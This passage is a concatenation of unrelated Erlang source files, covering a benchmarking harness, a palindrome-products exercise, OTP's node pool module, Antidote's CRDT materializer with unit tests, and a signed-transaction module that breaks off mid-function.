        true -> [{tw, TW}];
        false -> false
    end;
vpar(DI, #{} = M) ->
    case maps:size(M) == 0 andalso not has_c(DI) andalso not has_t(DI) of
        true -> [];
        false -> false
    end;
vpar(_, _) -> false.
%% Does the parsed DataInput descriptor contain a counter parameter?
has_c(DI) -> lists:member({c}, DI).
%% Does the parsed DataInput descriptor contain a timestep parameter?
has_t(DI) -> lists:keymember(t, 1, DI).
-module(perftest).
%% API
-export([ start/0
, start/1
, module/1
]).
%% Metadata about arguments for a test case: a map from the name of
%% the arguments to the list of possible values to test with.
%%
%% The test case will be executed will all the possible combination of
%% the arguments.
-type test_args_meta() :: #{Arg :: atom() => Values :: nonempty_list()}.
%% A specific combination of arguments selected from a
%% `test_args_meta' structure.
-type test_args() :: #{Arg :: atom() => Value :: term()}.
%% Test case state returned from the setup function to be passed to
%% the cleanup.
-type setup_state() :: term().
%% The possible return types of a function: normal return or various
%% exceptions.
-type return_type() :: normal | throw | error | exit.
-export_type([ test_args_meta/0
, test_args/0
, setup_state/0
, return_type/0
]).
%% ---------------------------------------------------------------------
%% Behaviour callbacks
%% ---------------------------------------------------------------------
%% Provide metadata about arguments for the test case.
-callback args() -> test_args_meta().
%% Prepare for executing the test case with the given arguments. The
%% function shall return the list of arguments to pass to the actual
%% test case and the state to pass to the `cleanup' function after
%% executing the test.
-callback setup(test_args()) -> {ok, list(), setup_state()}.
%% Validate the return value from a test case.
-callback validate(return_type(), term(), setup_state()) -> boolean().
%% Clean up after running a test case.
-callback cleanup(setup_state()) -> term().
%% ---------------------------------------------------------------------
%% API
%% ---------------------------------------------------------------------
%% @doc Execute all test modules found in the same directory with this
%% module.
-spec start() -> ok.
start() ->
    start(find_mods("*_test")).
%% @doc Execute a specific list of test modules.
-spec start([module()]) -> ok.
start(Mods) ->
    lists:foreach(fun module/1, Mods).
%% @doc Execute a single test module.
-spec module(module()) -> ok.
module(Mod) ->
    %% Run every implementation module matching this test module's
    %% name pattern against the full cartesian product of the declared
    %% argument values.
    Args = Mod:args(),
    ArgsList = maps:to_list(Args),
    ImplMods = find_mods(impl_pattern(Mod)) -- [Mod],
    [test(Mod, ImplMod, GeneratedArgs)
     || GeneratedArgs <- generate_args(ArgsList),
        ImplMod <- ImplMods
    ],
    ok.
%% ---------------------------------------------------------------------
%% Internal helper functions
%% ---------------------------------------------------------------------
%% @doc Find modules in the same directory as this one that match the
%% given pattern.
-spec find_mods(string()) -> [module()].
find_mods(Pattern) ->
    Dir = filename:dirname(code:which(?MODULE)),
    Ext = code:objfile_extension(),
    %% Atoms come from local compiled-module filenames, not user input.
    [list_to_atom(filename:basename(File, Ext))
     || File <- filelib:wildcard(Pattern ++ Ext, Dir)
    ].
%% @doc Get the module name pattern for implementation of a test case
%% module. A test case module must have a name like `X_test', and the
%% corresponding implementations will have to match the `X_*' pattern.
-spec impl_pattern(module() | string()) -> string().
impl_pattern(Mod) when is_atom(Mod) ->
    impl_pattern(atom_to_list(Mod));
impl_pattern("_test") ->
    %% Reached the trailing "_test" suffix: replace it with a wildcard.
    "_*";
impl_pattern([C | Cs]) ->
    [C | impl_pattern(Cs)].
%% @doc Generate all combination of arguments from argument meta-data.
%% The result enumerates the cartesian product of the value lists,
%% with earlier arguments varying slowest.
-spec generate_args([{K, [V]}]) -> [#{K => V}].
generate_args([]) ->
    [#{}];
generate_args([{Arg, Values} | Args]) ->
    %% Hoist the recursive expansion of the remaining arguments out of
    %% the comprehension; previously it was recomputed once per Value,
    %% making generation cost grow needlessly with the value counts.
    Tails = generate_args(Args),
    [maps:put(Arg, Value, GeneratedArgs)
     || Value <- Values,
        GeneratedArgs <- Tails
    ].
%% Benchmark ImplMod:run for one argument combination and print the
%% median / mean / sample stddev over 1000 timed runs, after 100
%% discarded warmup runs.
test(Mod, ImplMod, Args) ->
    {module, ImplMod} = code:ensure_loaded(ImplMod),
    %% Bounce the online scheduler count to settle the VM, then pin
    %% this coordinating process to scheduler 1, keeping it off the
    %% scheduler used by the measured process.
    erlang:system_flag(schedulers_online, 1),
    timer:sleep(100),
    erlang:system_flag(schedulers_online, erlang:system_info(schedulers)),
    process_flag(scheduler, 1),
    N = 1000,
    Warmup = 100,
    %% Drop the warmup samples (arrival order), then sort for the median.
    Times = lists:sort(
              lists:nthtail(
                Warmup,
                test_loop(Mod, ImplMod, Args, N + Warmup))),
    Median = lists:nth(N div 2, Times),
    Mean = lists:sum(Times) / N,
    %% Sample standard deviation (divides by N - 1).
    Dev = math:sqrt(
            lists:sum([(Time - Mean) * (Time - Mean) || Time <- Times])
            / (N - 1)),
    io:format("median: ~7b ns mean: ~10.3f +- ~10.3f ns [~w] ~w~n",
              [Median, Mean, Dev, ImplMod, Args]),
    %% Unpin from scheduler 1.
    process_flag(scheduler, 0),
    ok.
%% Run N timed iterations, each in a fresh linked process, collecting
%% the reported per-run times in order.
test_loop(Mod, ImplMod, Args, N) when N > 0 ->
    S = self(),
    P = spawn_link(fun () -> S ! {self(), test_proc(Mod, ImplMod, Args)} end),
    %% Wait for this specific child before starting the next run, so
    %% runs never overlap.
    receive {P, Time} ->
            [Time | test_loop(Mod, ImplMod, Args, N - 1)]
    end;
test_loop(_, _, _, 0) ->
    [].
%% One measured execution of ImplMod:run, performed in its own process
%% pinned to the last scheduler at maximum priority. Exceptions are
%% captured (and timed) rather than propagated, then handed to the
%% test module's validate callback. Returns the wall time of the call
%% in nanoseconds.
test_proc(Mod, ImplMod, Args) ->
    process_flag(scheduler, erlang:system_info(schedulers)),
    process_flag(priority, max),
    {ok, RunArgs, State} = Mod:setup(Args),
    erlang:yield(),
    Start = os:perf_counter(),
    {Class, Result, Stop} =
        try apply(ImplMod, run, RunArgs) of
            Value ->
                {normal, Value, os:perf_counter()}
        catch
            Kind:Reason ->
                {Kind, Reason, os:perf_counter()}
        end,
    true = Mod:validate(Class, Result, State),
    Mod:cleanup(State),
    erlang:convert_time_unit(Stop - Start, perf_counter, nanosecond).
-module(palindrome_products).
-export([smallest/2, largest/2, test_version/0]).
%% API
-spec smallest(integer(), integer()) -> {integer(), [{integer(), integer()}]} | {error, atom()}.
%% Smallest palindromic product of two factors in [Min, Max], together
%% with every factor pair that produces it.
smallest(Min, Max) when Min > Max ->
    {error, invalid_range};
smallest(Min, Max) ->
    %% Ascending factors with '<' comparison locate the minimum.
    Factors = lists:seq(Min, Max),
    palindromes(Factors, Factors, fun erlang:'<'/2, undefined).
-spec largest(integer(), integer()) -> {integer(), [{integer(), integer()}]} | {error, atom()}.
%% Largest palindromic product of two factors in [Min, Max].
largest(Min, Max) when Min > Max ->
    {error, invalid_range};
largest(Min, Max) ->
    %% Descending factors with '>' comparison locate the maximum.
    Factors = lists:seq(Max, Min, -1),
    palindromes(Factors, Factors, fun erlang:'>'/2, undefined).
-spec test_version() -> integer().
test_version() ->
    1.
%% Internal
%% Exhaustively walk all factor pairs (F1, F2), tracking the best
%% palindromic product found so far as {Product, FactorPairs}
%% (or 'undefined' before the first hit).
palindromes([], _F2, _Condition, Best) ->
    Best;
palindromes([_ | F1Tail], [], Condition, Best) ->
    %% Inner list exhausted: advance the outer factor. Restarting the
    %% inner list at F1Tail skips mirrored duplicate pairs.
    palindromes(F1Tail, F1Tail, Condition, Best);
palindromes([F1Head | _] = F1, [F2Head | F2Tail], Condition, Best) ->
    EvenBetter = case is_best(Condition, F1Head * F2Head, Best) of
                     true ->
                         {F1Head * F2Head, [{F1Head, F2Head}]};
                     equal ->
                         %% Same product via another pair: record it too.
                         {Product, Factors} = Best,
                         {Product, [{F1Head, F2Head} | Factors]};
                     false ->
                         Best
                 end,
    palindromes(F1, F2Tail, Condition, EvenBetter).
% Order matters for performance here, since we've got quite a few
% possibilities to check. As is_palindrome is the most expensive of
% our checks, attempt to delay that until we're sure it's necessary.
%% Returns true when Product is a palindrome that beats Best under
%% Condition, equal when it matches the current best product, and
%% false otherwise.
is_best(_Condition, Product, undefined) ->
    is_palindrome(Product);
is_best(_Condition, Product, {Product, _Factors}) ->
    equal;
is_best(Condition, Product, {Best, _Factors}) ->
    Condition(Product, Best) andalso is_palindrome(Product).
%% A number is a palindrome when its decimal digits read the same in
%% both directions. Comparing the first and last digit first
%% short-circuits most non-palindromes before paying for the full
%% list conversion and reversal.
is_palindrome(Product) ->
    Digits = integer_to_binary(Product),
    case binary:first(Digits) == binary:last(Digits) of
        false ->
            false;
        true ->
            AsList = binary_to_list(Digits),
            AsList == lists:reverse(AsList)
    end.
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 1996-2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
-module(pool).
%% Supplies a computational pool of processors.
%% The chief user interface function here is get_node()
%% Which returns the name of the nodes in the pool
%% with the least load !!!!
%% This function is callable from any node including the master
%% That is part of the pool
%% nodes are scheduled on a per usage basis and per load basis,
%% Whenever we use a node, we put at the end of the queue, and whenever
%% a node report a change in load, we insert it accordingly
% User interface Exports ...
-export([start/1,
start/2,
stop/0,
get_nodes/0,
get_nodes_and_load/0,
get_node/0,
pspawn/3,
attach/1,
pspawn_link/3]).
%% Internal Exports
-export([statistic_collector/0,
do_spawn/4,
init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2]).
%% User interface
%% Start up using the .hosts.erlang file
-spec start(Name) -> Nodes when
      Name :: atom(),
      Nodes :: [node()].
start(Name) ->
    start(Name,[]).
-spec start(Name, Args) -> Nodes when
      Name :: atom(),
      Args :: string(),
      Nodes :: [node()].
%% Start the global pool master (idempotent), boot one slave node per
%% listed host, and attach every node that came up.
start(Name, Args) when is_atom(Name) ->
    _ = gen_server:start({global, pool_master}, pool, [], []),
    Hosts = net_adm:host_file(),
    Nodes = start_nodes(Hosts, Name, Args),
    lists:foreach(fun attach/1, Nodes),
    Nodes.
%%
%% Interface functions ...
%%
-spec get_nodes() -> [node()].
%% All nodes currently in the pool (load info stripped).
get_nodes() ->
    get_elements(2, get_nodes_and_load()).
-spec attach(Node) -> 'already_attached' | 'attached' when
      Node :: node().
%% Add an already-running node to the pool.
attach(Node) ->
    gen_server:call({global, pool_master}, {attach, Node}).
%% Pool contents as {Load, Node} pairs, least loaded first.
get_nodes_and_load() ->
    gen_server:call({global, pool_master}, get_nodes).
-spec get_node() -> node().
%% Pick the node with the lowest load.
get_node() ->
    gen_server:call({global, pool_master}, get_node).
-spec pspawn(Mod, Fun, Args) -> pid() when
      Mod :: module(),
      Fun :: atom(),
      Args :: [term()].
%% Spawn M:F(A) on the least-loaded node in the pool; the caller's
%% group leader is passed along so I/O is routed back here.
pspawn(M, F, A) ->
    gen_server:call({global, pool_master}, {spawn, group_leader(), M, F, A}).
-spec pspawn_link(Mod, Fun, Args) -> pid() when
      Mod :: module(),
      Fun :: atom(),
      Args :: [term()].
%% Like pspawn/3, but links the caller to the new process. Note the
%% link is established after the spawn, so there is a short window in
%% which the child can die unnoticed.
pspawn_link(M, F, A) ->
    P = pspawn(M, F, A),
    link(P),
    P.
%% Start a slave node on every host; hosts that fail are skipped, but
%% nodes that were already running are kept in the result.
start_nodes([], _, _) -> [];
start_nodes([Host|Tail], Name, Args) ->
    case slave:start(Host, Name, Args) of
        {error, {already_running, Node}} ->
            %% The node exists already: report it, but still pool it.
            io:format("Can't start node on host ~w due to ~w~n",[Host, {already_running, Node}]),
            [Node | start_nodes(Tail, Name, Args)];
        {error, R} ->
            io:format("Can't start node on host ~w due to ~w~n",[Host, R]),
            start_nodes(Tail, Name, Args);
        {ok, Node} ->
            [Node | start_nodes(Tail, Name, Args)]
    end.
-spec stop() -> 'stopped'.
%% Shut down the pool master and, via terminate/2, all slave nodes.
stop() ->
    gen_server:call({global, pool_master}, stop).
%% Project element Pos out of every tuple in the list.
get_elements(_Pos,[]) -> [];
get_elements(Pos,[E|T]) -> [element(Pos,E) | get_elements(Pos,T)].
%% Halt every listed node (fire-and-forget rpc).
stop_em([]) -> stopped;
stop_em([N|Tail]) ->
    rpc:cast(N, erlang, halt, []),
    stop_em(Tail).
%% gen_server state: [{Load, Node}], kept sorted with the least-loaded
%% node first.
init([]) ->
    process_flag(trap_exit, true),
    %% Start collecting load samples for the master node itself.
    spawn_link(pool, statistic_collector, []),
    {ok,[{0,node()}]}.
handle_call(get_nodes, _From, Nodes)->
    {reply, Nodes, Nodes};
handle_call(get_node, _From, [{Load,N}|Tail]) ->
    %% Hand out the least-loaded node and requeue it with a bumped load.
    {reply, N, Tail++[{Load+1, N}]};
handle_call({attach, Node}, _From, Nodes) ->
    case lists:keymember(Node, 2, Nodes) of
        true ->
            {reply, already_attached, Nodes};
        false ->
            erlang:monitor_node(Node, true),
            %% Run a load collector on the new node; it reports back
            %% to this server as {Node, load, Load} messages.
            spawn_link(Node, pool, statistic_collector, []),
            %% A new node starts at "infinite" load until it reports.
            {reply, attached, Nodes++[{999999,Node}]}
    end;
handle_call({spawn, Gl, M, F, A}, _From, Nodes) ->
    [{Load,N}|Tail] = Nodes,
    Pid = spawn(N, pool, do_spawn, [Gl, M, F, A]),
    {reply, Pid, Tail++[{Load+1, N}]};
handle_call(stop, _From, Nodes) ->
    %% clean up in terminate/2
    {stop, normal, stopped, Nodes}.
handle_cast(_, Nodes) ->
    {noreply, Nodes}.
handle_info({Node,load,Load}, Nodes) ->
    %% Fresh load sample: reposition the node in the sorted list.
    Nodes2 = insert_node({Load,Node}, Nodes),
    {noreply, Nodes2};
handle_info({nodedown, Node}, Nodes) ->
    {noreply, lists:keydelete(Node, 2, Nodes)};
handle_info(_, Nodes) ->  %% The EXIT signals etc.etc
    {noreply, Nodes}.
terminate(_Reason, Nodes) ->
    %% Halt every pooled node except the local one.
    N = lists:delete(node(), get_elements(2, Nodes)),
    stop_em(N),
    ok.
-spec do_spawn(pid(), module(), atom(), [term()]) -> term().
%% Runs on the chosen pool node: adopt the caller's group leader so
%% I/O from the spawned code goes back to the originating node.
do_spawn(Gl, M, F, A) ->
    group_leader(Gl, self()),
    apply(M, F, A).
%% Re-insert a freshly reported {Load, Node} sample, keeping the list
%% sorted by load.
insert_node({Load,Node},[{L,Node}|Tail]) when Load > L ->
    %% We have a raised load here
    pure_insert({Load,Node},Tail);
insert_node({Load,Node},[{L,N}|Tail]) when Load =< L ->
    %% Move forward in the list
    T = lists:keydelete(Node,2,[{L,N}|Tail]),
    [{Load,Node} | T];
insert_node(Ln,[H|T]) ->
    [H | insert_node(Ln,T)];
insert_node(X,[]) -> % Can't happen
    error_logger:error_msg("Pool_master: Bad node list X=~w\n", [X]),
    exit(crash).
%% Plain sorted insert by load (the entry is known to be absent).
pure_insert({Load,Node},[]) ->
    [{Load,Node}];
pure_insert({Load,Node},[{L,N}|Tail]) when Load < L ->
    [{Load,Node}, {L,N} | Tail];
pure_insert(L,[H|T]) -> [H|pure_insert(L,T)].
%% Really should not measure the contributions from
%% the background processes here .... which we do :-(
%% We don't have to monitor the master, since we're slaves anyway
%% Wait (up to 5 polls, 300 ms apart) for the global pool master to
%% appear, then start reporting run-queue samples to it.
statistic_collector() ->
    statistic_collector(5).
statistic_collector(0) -> exit(normal);
statistic_collector(I) ->
    sleep(300),
    case global:whereis_name(pool_master) of
        undefined ->
            statistic_collector(I-1);
        M ->
            %% 999999 guarantees the first real sample differs and so
            %% gets reported.
            stat_loop(M, 999999)
    end.
%% Do not tell the master about our load if it has not changed
stat_loop(M, Old) ->
    sleep(2000),
    case statistics(run_queue) of
        Old ->
            stat_loop(M, Old);
        NewLoad ->
            M ! {node(), load, NewLoad}, %% async
            stat_loop(M, NewLoad)
    end.
sleep(I) -> receive after I -> ok end. | lib/stdlib/src/pool.erl | 0.569374 | 0.418756 | pool.erl | starcoder |
%% -------------------------------------------------------------------
%%
%% Copyright <2013-2018> <
%% Technische Universität Kaiserslautern, Germany
%% Université Pierre et Marie Curie / Sorbonne-Université, France
%% Universidade NOVA de Lisboa, Portugal
%% Université catholique de Louvain (UCL), Belgique
%% INESC TEC, Portugal
%% >
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either expressed or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% List of the contributors to the development of Antidote: see AUTHORS file.
%% Description and complete License: see LICENSE file.
%% -------------------------------------------------------------------
%% @doc Responsible for generating the object versions requested by clients.
-module(materializer).
-include("antidote.hrl").
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([
create_snapshot/1,
update_snapshot/3,
materialize_eager/3,
check_operations/1,
check_operation/1,
belongs_to_snapshot_op/3
]).
%% @doc Creates an empty CRDT
%% An unsupported Type crashes with a badmatch error (see
%% materializer_error_nocreate_test below).
-spec create_snapshot(type()) -> snapshot().
create_snapshot(Type) ->
    antidote_crdt:new(Type).
%% @doc Applies a downstream effect to a snapshot of a crdt.
%% This function yields an error if the crdt does not have a corresponding update operation.
-spec update_snapshot(type(), snapshot(), effect()) -> {ok, snapshot()} | {error, reason()}.
update_snapshot(Type, Snapshot, Op) ->
    try
        antidote_crdt:update(Type, Op, Snapshot)
    catch
        %% Deliberately broad: any crash in the CRDT library is mapped
        %% to a tagged error so callers can surface it instead of dying.
        _:_ ->
            {error, {unexpected_operation, Op, Type}}
    end.
%% @doc Applies updates in given order without any checks, errors are
%% simply propagated: the walk stops at the first failing effect and
%% its error tuple is returned instead of a snapshot.
-spec materialize_eager(type(), snapshot(), [effect()]) ->
          snapshot() | {error, {unexpected_operation, effect(), type()}}.
materialize_eager(_Type, Snapshot, []) ->
    Snapshot;
materialize_eager(Type, Snapshot, [Effect | Remaining]) ->
    case update_snapshot(Type, Snapshot, Effect) of
        {ok, Updated} ->
            materialize_eager(Type, Updated, Remaining);
        {error, _Reason} = Error ->
            Error
    end.
%% @doc Check that in a list of client operations, all of them are correctly typed.
-spec check_operations([client_op()]) -> ok | {error, {type_check_failed, client_op()}}.
check_operations(Ops) ->
    %% Walk past the well-typed prefix; whatever stopped the walk is
    %% the first ill-typed operation.
    case lists:dropwhile(fun check_operation/1, Ops) of
        [] ->
            ok;
        [BadOp | _] ->
            {error, {type_check_failed, BadOp}}
    end.
%% @doc Checks that a single client operation is correctly typed.
%% Dispatches on the operation's shape via function clauses: updates must
%% name a known CRDT type and a valid operation for it, reads must name a
%% known CRDT type, and anything else is rejected.
-spec check_operation(client_op()) -> boolean().
check_operation({update, {_Key, Type, Update}}) ->
    antidote_crdt:is_type(Type) andalso
        antidote_crdt:is_operation(Type, Update);
check_operation({read, {_Key, Type}}) ->
    antidote_crdt:is_type(Type);
check_operation(_Other) ->
    false.
%% @doc Answers "is this operation NOT yet contained in the snapshot?"
%% (the historical name is misleading; it really checks non-membership).
%% Returns true if the op is more recent than the snapshot time, i.e. it
%% is not in the snapshot; false otherwise. An 'ignore' snapshot time
%% means there is no snapshot bound, so every op counts as more recent.
-spec belongs_to_snapshot_op(snapshot_time() | ignore, dc_and_commit_time(), snapshot_time()) ->
    boolean().
belongs_to_snapshot_op(ignore, {_OpDc, _OpCommitTime}, _OpSs) ->
    true;
belongs_to_snapshot_op(SSTime, {OpDc, OpCommitTime}, OpSs) ->
    %% Pin the op's own commit entry into its snapshot vector, then check
    %% whether the result is still dominated by the snapshot time.
    OpSs1 = vectorclock:set(OpDc, OpCommitTime, OpSs),
    not vectorclock:le(OpSs1, SSTime).
-ifdef(TEST).
%% Testing update with pn_counter: a fresh counter is 0 and a single
%% increment by 1 yields 1.
update_pncounter_test() ->
    Type = antidote_crdt_counter_pn,
    Counter = create_snapshot(Type),
    ?assertEqual(0, Type:value(Counter)),
    Op = 1,
    {ok, Counter2} = update_snapshot(Type, Counter, Op),
    ?assertEqual(1, Type:value(Counter2)).

%% Testing pn_counter with an update log: increments 1+1+2+3 sum to 7.
materializer_counter_withlog_test() ->
    Type = antidote_crdt_counter_pn,
    Counter = create_snapshot(Type),
    ?assertEqual(0, Type:value(Counter)),
    Ops = [
        1,
        1,
        2,
        3
    ],
    Counter2 = materialize_eager(Type, Counter, Ops),
    ?assertEqual(7, Type:value(Counter2)).

%% Testing counter with an empty update log: value stays 0.
materializer_counter_emptylog_test() ->
    Type = antidote_crdt_counter_pn,
    Counter = create_snapshot(Type),
    ?assertEqual(0, Type:value(Counter)),
    Ops = [],
    Counter2 = materialize_eager(Type, Counter, Ops),
    ?assertEqual(0, Type:value(Counter2)).
%% Testing a non-existing crdt type: creating a snapshot for an unknown
%% type must raise (antidote_crdt:new/1 asserts the type is known).
materializer_error_nocreate_test() ->
    ?assertException(error, {badmatch, false}, create_snapshot(bla)).

%% Testing a crdt with an invalid update operation: the error produced by
%% update_snapshot/3 is propagated unchanged by materialize_eager/3.
materializer_error_invalidupdate_test() ->
    Type = antidote_crdt_counter_pn,
    Counter = create_snapshot(Type),
    ?assertEqual(0, Type:value(Counter)),
    Ops = [{non_existing_op_type, {non_existing_op, actor1}}],
    ?assertEqual(
        {error,
            {unexpected_operation, {non_existing_op_type, {non_existing_op, actor1}},
                antidote_crdt_counter_pn}},
        materialize_eager(Type, Counter, Ops)
    ).
%% Testing that check_operations/1 works properly: a well-typed batch is
%% accepted, while a batch containing a set-style op ({{add, elem}, a})
%% on a pn-counter is rejected with a type_check_failed error.
check_operations_test() ->
    Operations =
        [
            {read, {key1, antidote_crdt_counter_pn}},
            {update, {key1, antidote_crdt_counter_pn, increment}}
        ],
    ?assertEqual(ok, check_operations(Operations)),
    Operations2 = [
        {read, {key1, antidote_crdt_counter_pn}},
        {update, {key1, antidote_crdt_counter_pn, {{add, elem}, a}}},
        {update, {key2, antidote_crdt_counter_pn, {increment, a}}},
        {read, {key1, antidote_crdt_counter_pn}}
    ],
    ?assertMatch({error, _}, check_operations(Operations2)).
%% Testing belongs_to_snapshot_op/3: returns true when the operation's
%% clock is not yet covered by the snapshot time, false when the
%% operation is already included. The snapshot holds clock 5 for both
%% DC 1 and DC 2.
belongs_to_snapshot_test() ->
    CommitTime1a = 1,
    CommitTime2a = 1,
    CommitTime1b = 1,
    CommitTime2b = 7,
    SnapshotClockDC1 = 5,
    SnapshotClockDC2 = 5,
    CommitTime3a = 5,
    CommitTime4a = 5,
    CommitTime3b = 10,
    CommitTime4b = 10,
    SnapshotVC = vectorclock:from_list([{1, SnapshotClockDC1}, {2, SnapshotClockDC2}]),
    %% Ops committed strictly below the snapshot entries -> not yet in SS.
    ?assertEqual(
        true,
        belongs_to_snapshot_op(
            vectorclock:from_list([{1, CommitTime1a}, {2, CommitTime1b}]),
            {1, SnapshotClockDC1},
            SnapshotVC
        )
    ),
    ?assertEqual(
        true,
        belongs_to_snapshot_op(
            vectorclock:from_list([{1, CommitTime2a}, {2, CommitTime2b}]),
            {2, SnapshotClockDC2},
            SnapshotVC
        )
    ),
    %% Ops committed at/above the snapshot entries -> already covered.
    ?assertEqual(
        false,
        belongs_to_snapshot_op(
            vectorclock:from_list([{1, CommitTime3a}, {2, CommitTime3b}]),
            {1, SnapshotClockDC1},
            SnapshotVC
        )
    ),
    ?assertEqual(
        false,
        belongs_to_snapshot_op(
            vectorclock:from_list([{1, CommitTime4a}, {2, CommitTime4b}]),
            {2, SnapshotClockDC2},
            SnapshotVC
        )
    ).
-endif.
%% @doc Implements a data structure for cryptographically signed transactions.
%% This is the envelope around transactions to make them cryptographically safe.
%% The transactions normally also have keys of the "signers" in the transaction,
%% which are extracted using the signers/1 function in the respective transaction
%% handler.
%%
%% The purpose of this module is to provide an API for cryptographically signed
%% transactions and hide all implementation details. Therefore, the record
%% #signed_tx{} should be kept private and considered an abstract type.
%%
%% A transaction can be signed by one or several signers. Each transaction can
%% determine its own signers by the transaction callback 'signers'. Since we do not
%% want to depend upon transaction types in this module, the user of
%% {@module} should first obtain the signers of the transaction and then call this
%% {@link sign/2} with these signers. There is a {@link sign/3} function that can sign
%% with respect to a certain block height. This is handy whenever the governance
%% variables on what crypto to use would change.
-module(dsdtx_sign).
%% API
-export([sign/2,
hash/1,
add_signatures/2,
tx/1,
verify/2,
signatures/1]).
%% API that should be avoided to be used
-export([serialize_for_client/3,
serialize_for_client_pending/2,
meta_data_from_client_serialized/2,
serialize_to_binary/1,
deserialize_from_binary/1]).
-export_type([signed_tx/0,
binary_signed_tx/0]).
-include_lib("apps/dsdcore/include/blocks.hrl").
-include_lib("apps/dsdcore/include/dsdc_crypto.hrl").
-record(signed_tx, {
tx :: dsdtx:tx(),
signatures = ordsets:new() :: ordsets:ordset(binary())}).
-opaque signed_tx() :: #signed_tx{}.
-type binary_signed_tx() :: binary().
-define(VALID_PUBK(K), byte_size(K) =:= 32).
-define(VALID_PRIVK(K), byte_size(K) =:= 64).
%% @doc Given a transaction Tx and a private key or a list of private
%% keys, return the cryptographically signed transaction using the
%% default crypto parameters. Keys of the wrong size raise an
%% {invalid_priv_key, Keys} error before any signature is produced.
-spec sign(dsdtx:tx(), list(binary()) | binary()) -> signed_tx().
sign(Tx, PrivKey) when is_binary(PrivKey) ->
    sign(Tx, [PrivKey]);
sign(Tx, PrivKeys) when is_list(PrivKeys) ->
    Bin = dsdtx:serialize_to_binary(Tx),
    case [Key || Key <- PrivKeys, not (?VALID_PRIVK(Key))] of
        [] ->
            ok;
        BrokenKeys ->
            erlang:error({invalid_priv_key, BrokenKeys})
    end,
    Signatures = [enacl:sign_detached(Bin, Key) || Key <- PrivKeys],
    #signed_tx{tx = Tx, signatures = lists:sort(Signatures)}.
%% @doc Hash of the canonical binary serialization of a signed transaction.
-spec hash(signed_tx()) -> binary().
hash(#signed_tx{} = Tx) ->
    dsdc_hash:hash(signed_tx, serialize_to_binary(Tx)).

%% @doc Adds signatures to a signed transaction. Duplicates are dropped
%% and the combined set is kept sorted (lists:usort/1), preserving the
%% canonical ordering used at signing time.
-spec add_signatures(signed_tx(), list(binary())) -> signed_tx().
add_signatures(#signed_tx{signatures = OldSigs} = Tx, NewSigs)
  when is_list(NewSigs) ->
    Tx#signed_tx{signatures = lists:usort(NewSigs ++ OldSigs)}.

-spec tx(signed_tx()) -> dsdtx:tx().
%% @doc Get the original transaction from a signed transaction.
%% Note that no verification is performed, it just returns the transaction.
%% We have no type yet for any transaction, and spend_tx()
%% seems restricted as type.
tx(#signed_tx{tx = Tx}) ->
    Tx.

%% @doc Get the signatures of a signed transaction.
-spec signatures(signed_tx()) -> list(binary()).
signatures(#signed_tx{signatures = Sigs}) ->
    Sigs.
%% @doc Verifies that every signer of the transaction has provided a
%% valid detached signature over its canonical serialization.
-spec verify(signed_tx(), dsdc_trees:trees()) -> ok | {error, signature_check_failed}.
verify(#signed_tx{tx = Tx, signatures = Sigs}, Trees) ->
    Bin = dsdtx:serialize_to_binary(Tx),
    case dsdtx:signers(Tx, Trees) of
        {ok, Signers} ->
            verify_signatures(Signers, Bin, Sigs);
        {error, _Reason} ->
            {error, signature_check_failed}
    end.

%% Matches each expected public key against the remaining signatures.
%% NOTE: clause order matters — success requires both the pubkey list and
%% the signature list to be exhausted together; leftover signatures
%% (third clause) are treated as a failure.
verify_signatures([PubKey|Left], Bin, Sigs) ->
    case verify_one_pubkey(Sigs, PubKey, Bin) of
        {ok, SigsLeft} -> verify_signatures(Left, Bin, SigsLeft);
        error -> {error, signature_check_failed}
    end;
verify_signatures([],_Bin, []) ->
    ok;
verify_signatures(PubKeys,_Bin, Sigs) ->
    lager:debug("Signature check failed: ~p ~p", [PubKeys, Sigs]),
    {error, signature_check_failed}.

%% Entry point: scan all signatures for one matching this public key.
verify_one_pubkey(Sigs, PubKey, Bin) ->
    verify_one_pubkey(Sigs, PubKey, Bin, []).

%% On a match, returns {ok, RemainingSigs} so each signature is consumed
%% at most once. The guard rejects malformed pubkeys; clause order makes
%% "ran out of signatures" and "invalid pubkey" both fail with 'error'.
verify_one_pubkey([Sig|Left], PubKey, Bin, Acc) when ?VALID_PUBK(PubKey) ->
    case enacl:sign_verify_detached(Sig, Bin, PubKey) of
        {ok, _} -> {ok, Acc ++ Left};
        {error, _} -> verify_one_pubkey(Left, PubKey, Bin, [Sig|Acc])
    end;
verify_one_pubkey([], _PubKey,_Bin,_Acc) -> % no more signatures
    error;
verify_one_pubkey(_, _PubKey,_Bin,_Acc) -> % invalid pubkey
    error.
-define(SIG_TX_TYPE, signed_tx).
-define(SIG_TX_VSN, 1).

%% @doc Deterministic canonical serialization: signatures are sorted so
%% the same signed transaction always serializes to the same bytes.
-spec serialize_to_binary(signed_tx()) -> binary_signed_tx().
serialize_to_binary(#signed_tx{tx = Tx, signatures = Sigs}) ->
    %% TODO: The original binary should be kept
    %% around since that is what was signed
    dsdc_object_serialization:serialize(
        ?SIG_TX_TYPE,
        ?SIG_TX_VSN,
        serialization_template(?SIG_TX_VSN),
        [ {signatures, lists:sort(Sigs)}
        , {transaction, dsdtx:serialize_to_binary(Tx)}
        ]).

%% @doc Inverse of serialize_to_binary/1. Crashes (badmatch) on input
%% that does not deserialize to the expected template.
-spec deserialize_from_binary(binary()) -> signed_tx().
deserialize_from_binary(SignedTxBin) when is_binary(SignedTxBin) ->
    [ {signatures, Sigs}
    , {transaction, TxBin}
    ] = dsdc_object_serialization:deserialize(
            ?SIG_TX_TYPE,
